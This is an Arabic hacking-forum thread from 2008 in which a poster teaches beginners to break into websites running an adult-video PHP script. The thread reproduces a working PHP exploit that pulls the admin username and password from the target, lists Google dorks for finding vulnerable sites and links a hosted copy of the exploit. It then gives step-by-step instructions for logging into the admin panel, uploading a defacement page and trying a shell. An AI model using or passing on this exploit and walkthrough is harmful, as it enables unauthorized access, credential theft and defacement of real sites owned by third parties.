imzourencity+imatawen عزيز الزائر نعتدر عن الازعاج ** تبين لنا انك لم تقم بتسجيل الدخول نرجو منك التعريف بنفسك .. ان لم تكن مسجلا فالرجاء التسجيل لتنضم الى اسرتنا وشكرا امزورن سيتي مدينة الترفيه لشباب 2009 **سؤال البحث نتائج البحث عدد المساهمات مواضيع -------------------------------------------------------------------------------- بحث متقدم **** imzourencity+imatawen :: امتاون امزورن سيتي :: مواضيع قديمة شاطر | المزيد! المزيد! استعرض المواضيع الجديدة منذ آخر زيارة لي استعرض مُساهماتك استعراض المواضيع التي لم يتم الرد عليها المواضيع المراقبة -------------------------------------------------------------------------------- أضف إلى المفضلة ارسل إلى صديق(ة) قم بنسخ عنوان ال BBCode للصفحة طبع هذه الصفحة حصريا شـرح ثغرة لاختراق سكربت مواقع جنسية للمبتدئين Adult ****** Unauthorized Admin كاتب الموضوع رسالة كخعتضاهيث فريق هكر ايمتاون عدد الرسائل: 174 : السٌّمعَة: 0 تاريخ التسجيل: 21/04/2008 موضوع: حصريا شـرح ثغرة لاختراق سكربت مواقع جنسية للمبتدئين Adult ****** Unauthorized Admin الإثنين أغسطس 25, 2008 10:06 pm -------------------------------------------------------------------------------- بــــــــــــــــــــــــ ــــسم الله الـــــــــــــــرحــــــ مـــــن الــــــــــــــرحـــــــ ـيــــــــــــــــم الحمد لله الذي جعلنا مسلمين واللهم صل و سلم على سيدنا محمد و على آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين آمين السلام عليكم و رحمة الله و بركاته أهل بيت الهكر اليوم باذن الله سنقوم بشرح ثغرة جديدة نزلت تقريبا في جميع مواقع السكيوريتي بتاريخ 2007-12-13 اسم الثغرة هو Adult ****** Unauthorized Administrative Access Exploit و الثغرة مكتوبة بلغة PHP و هذه الثغرة تخص سكربت معين الغرض منه بالتحديد انه يستعمل في المواقع الاباحية التي تعرض الفيديوهات نشوف رابط الثغرة معا في موقع الميل ورم Adult Script <= 1.6 Unauthorized Administrative Access Exploit كود PHP: ( ($_SESSION['adminid']=="") && ($_SESSION['admintype'] !=1)) { header("********: logout.php"); // Bypass Me :D } </pre> <br> <b>Dork</b>:<br> inurl:submit-user-link.html<br> inurl:video-listing-cat<br> inurl:hosted-videos<br> inurl:porn-listing-cat<br> "Powered By Adult******.NET"<br> "Copyright 2007 [IAG].Adult******.v1.5.Nulled"<br> <br> <form method="POST" action=""> <input name="adres" type="text" value="Target example: http://www.site.com/" size="70" onFocus="if(this.value=='Target example: http://www.site.com/')this.value=''" onBlur="if(this.value=='')this.value='Target example: http://www.site.com/'"> <input name="yolla" type="submit" value="Send"> </form> <br> <?php function dosya_indir($liz0){ $ch = curl_init(); $timeout = 0; curl_setopt ($ch, CURLOPT_URL, $liz0); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); $veri = curl_exec($ch); curl_close($ch); return $veri; } $desen='|value="(.*)"|'; if($_POST[yolla]) { $adres=$_POST[adres]; if(!eregi("http",$adres)) { $adres="http://".$adres; } if($adres=="") { echo 'Boş Yerleri Doldurun'; exit(); } echo 'Target= '.htmlspecialchars($adres)."<br>"; sleep(1); echo 'Sending Evil Code.......<br>'; $kaynak=dosya_indir($adres."/admin/administrator.php"); sleep(5); if(eregi('value="',$kaynak)) { echo "Exploit Has Been Succeful <br>"; preg_match_all($desen,$kaynak,$sonuc); echo "<a target='_blank' href='".$adres."/admin/'>".$adres."/admin/</a><br>"; echo "<b>Username</b> :".htmlspecialchars($sonuc[1][0])."<br>"; echo "<b>Password</b>:".htmlspecialchars($sonuc[1][1])."<br>"; echo $adres."/admin/videolinks_view.php edit video and upload ****l "; } else { echo "Exploit Has Been Failed! <br>"; } } ?> # milw0rm.com [2007-12-13] جيد الان سنتعلم كيف يتم استغلال هذا النوع من الثغرات الاستغلال يكون كالتالي تقوم بنسخ كود الثغرة كاملا ثم تنسخه بالمفكرة و تقوم بتسميته ثم تحفظ الملف بامتداد PHP و ترفعه الى موقعك اى لازم اولا يكون عندك مساحة خاصة بك قمت برفع الملف على مساحة مجانية بـــ ripway لكن الثغرة لم تشتغل لكن انا لم اجرب على موقع lycos فممكن أن تنجح اذن فما الحل |5| لازم يكون عندك استضافة مدفوعة لكى يشتغل السكربت تمام طيب انت تقول انا ما عندي أنا اقولك ولا يهمك وجدت باحد المنتديات التركية الرابط جـــــــــاهز زي العسل |11| و هذا رابط الثغرة و قمت بتجربته و هو شغال تمام http://www.r57.li/adult.php طيب الان نبدأ بشرح كيفية التعامل مع السكربت و جلب معلومات الادمن |ok| وهي زبدة الموضوع |7| تابع الشرح كما في الصورة This image has been resized. Click this bar to view the full image. The original image is sized 701x503. كما نلاحظ بالصورة كل شئ وا ضح كما نرى ان السكريت سهل جدا و كل شئ موضح امامك في السكربت نفسه الان وش تعمل الخطوة الثانية هي البحث عن مواقع مصابة و ذلك باستعمال الدورك في محرك البحث قوقــــــــــــل شوف الصورة انا اخترت الدورك الثاني على سبيل المثال لا الحصر انت حر في اختيار ايها شئت |7| Google تضع الدورك في محرك البحث و تضغط بحث تابع الصورة This image has been resized. Click this bar to view the full image. The original image is sized 800x600. ستلاحظ ظهور نتائج البحث و المواقع المصابة كثيرة و انت كل مرة استعمل دورك مختلف كي توسع مجال البحث ...مثلا انا اخترت احد المواقع تابع الصورة This image has been resized. Click this bar to view the full image. The original image is sized 800x600. الان تروح لرابط السكربت و تبدأ بالعمل بعد ما تختار احد المواقع و بامكانك ان تجرب على الكل واحد واحد تابع الصورة This image has been resized. Click this bar to view the full image. The original image is sized 800x717. الان طبق كما هو موضح في الصورة كما تلاحظون عند انتهاء العملية و بعد ظهور معلومات الادمن كاتب الثغرة يقول انه بالامكان رفع شل في الرابط المبين ادناه upload ****l انا جربت ارفع شل على شكل صورة لكن ما نجحت الطريقة معي و هذه اتركها للمحترفيين ان شاء الله يجدون لها حل |7| طيب انت طبقت خلاص و جبت اسم و كلمة سر الادمن الان تذهب الى رابط الدخول الى لوحة التحكم تابع الصورة This image has been resized. Click this bar to view the full image. The original image is sized 800x533. بعد وضع اسم و كلمة المرور سيتم نقلك الى لو حة تحكم الادمن تابع الصورة This image has been resized. Click this bar to view the full image. The original image is sized 800x600. الان ننتقل الى الخطوة الاخيرة و هي تنفيذ الهجوم رفع الاندكس تابع الصورة This image has been resized. Click this bar to view the full image. The original image is sized 800x600. بعد رفع الاكواد الخاصة بصفحة اختراقك او كود التحويل لا تنسى شئ مهم تابع الصورة This image has been resized. Click this bar to view the full image. The original image is sized 732x341. مبـــــــــــــــــروك الان تم الاختراق اذهب الى الصفحة الرئيسية و شاهد الاختراق لآى استفسارات أو أسئلة |1| فأنا جاهز ان شاء الله تـــــــــــم بحمد الله هذا وما كان من توفيق فمن الله وحده, وما كان من خطأ أو سهو أو زلل أو نسيان فمني ومن الشيطان وأعوذ بالله أن أذكركم به وأنساه.
الشرح منقول أخي + الصور لا تظهر
اخي ماهو كود الاستغلال لاهنت
شكرا جندى على التوبك الجميل
ايش هذه المسخره ؟؟!!!! الموضوع يــــغـــلـــق
فيديو اليوم اللهم صلي على سيدنا محمد ، على عَدد خَلقِك وَعلى قدر عَظَمَتك وعلى قَدرٍ محبتك له . سجل إختراقك الأن في Aljyyosh.org بمميزات عديده من مواضيعي: 1 - عمل ايميل ياهو - ياهو 2 - عمل ايميل - انشاء ايميل 3 - كيف اسوي ايميل - انشاء ايميل 4 - تحميل الياهو 5 - برامج حماية 6 - دورة اختراق المواقع 7 - فتح المواقع المحجوبة 8 - لعبة فيفا 2012 9 - لعبة كاونتر سترايك 10 - لعبة GTA San Andreas 11 - استعادة الملفات 12 - فك الضغط 11 - لعبة صلاح الدين 12 - لعبة فاي ستي 13 - لعبة pes 2012 14 - عمل فيس بوك - فيس بوك 15 - فوتو فونيا - photofunia 2012 16 - برنامج تشارلز - برنامج Charles 17 - تحميل برنامج داون لود مانجر 18 - برنامج Internet Download Manager 19 - تحميل انترنت اكسبلورر 20 - لعبة جاتا - تحميل لعبة جاتا - لعبة gta 21 - لعبة نيد فور سبيد - لعبة need for speed 22 - لعبة كراش - لعبة crash 23 - لعبة ماين كرافت - لعبة MineCraft 24 - برامج - تحميل برامج - تحميل العاب 25 - تحميل برنامج محول الصوتيات 26 - برنامج تركيب الصور 27 - كراك idm 28 - تحميل كاسبر سكاي 29 - تحميل ماسنجر بلس 30 - برنامج تسريع النت سُبْحَانَكَ اللَّهُمَّ وبَحَمْدكَ أشْهدُ أنْ لا إلهَ إلا أنْتَ أَسْتَغْفِرُكَ وأتُوبُ إِلَيْكَ
قوانين المنتدى